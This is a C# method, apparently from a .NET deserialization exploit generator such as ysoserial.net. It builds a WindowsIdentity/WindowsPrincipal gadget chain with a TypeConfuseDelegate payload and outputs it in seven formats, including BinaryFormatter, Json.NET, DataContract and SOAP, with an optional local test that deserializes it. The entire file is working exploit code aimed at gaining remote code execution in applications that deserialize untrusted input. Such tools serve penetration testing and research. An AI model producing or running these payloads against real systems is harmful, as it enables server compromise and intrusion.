public override object Generate(string formatter, InputArgs inputArgs)
{
Generator generator = new TypeConfuseDelegateGenerator();
WindowsIdentity id = WindowsIdentity.GetCurrent();
id.Actor = new ClaimsIdentity();
id.Actor.BootstrapContext = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
BinaryFormatter bf = new BinaryFormatter();
var ms = new MemoryStream();
bf.Serialize(ms, id);
byte[] gadget = ms.ToArray();
string b64encoded = Convert.ToBase64String(gadget);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
WindowsPrincipalMarshal obj = new WindowsPrincipalMarshal();
obj.wi = id;
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = @"{
'$type': 'System.Security.Principal.WindowsPrincipal, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'Identity':{
'$type':'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"'
}
}";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = JSONMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = $@"<root type=""System.Security.Principal.WindowsPrincipal, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<WindowsPrincipal xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" >
<m_identity>
<System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""" xmlns:x=""http://www.w3.org/2001/XMLSchema"" >
{b64encoded}
</System.Security.ClaimsIdentity.actor>
</m_identity>
</WindowsPrincipal>
</root>";
// this will break the payload, because x is used! todo for @irsdl: fix the xslt in XMLMinifier.cs to have the option to include "unused variables"
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
string payload = $@"
<WindowsPrincipal z:Type=""System.Security.Principal.WindowsPrincipal"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" >
<m_identity z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" >
<System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" xmlns="""">
{b64encoded}
</System.Security.ClaimsIdentity.actor>
</m_identity>
</WindowsPrincipal>";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractjsonserializer"))
{
string payload = "{\"__type\":\"WindowsPrincipal:#System.Security.Principal\",\"m_identity\":{\"System.Security.ClaimsIdentity.actor\":\"" + b64encoded + "\"}}";
// this is unsupported for this formatter
if (inputArgs.Minify || inputArgs.UseSimpleType)
{
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractJsonSerializer_deserialize(payload, typeof(WindowsPrincipal).AssemblyQualifiedName, null);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = $@"
<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC= ""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsPrincipal xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal"">
<m_identity href = ""#ref-2"" />
<m_roles xsi:null=""1"" />
<m_rolesTable xsi:null=""1"" />
<m_rolesLoaded>false</m_rolesLoaded>
</a1:WindowsPrincipal>
<a1:WindowsIdentity id=""ref-2"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal"">
<System.Security.ClaimsIdentity.actor>{b64encoded}</System.Security.ClaimsIdentity.actor>
</a1:WindowsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter);
}
else
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
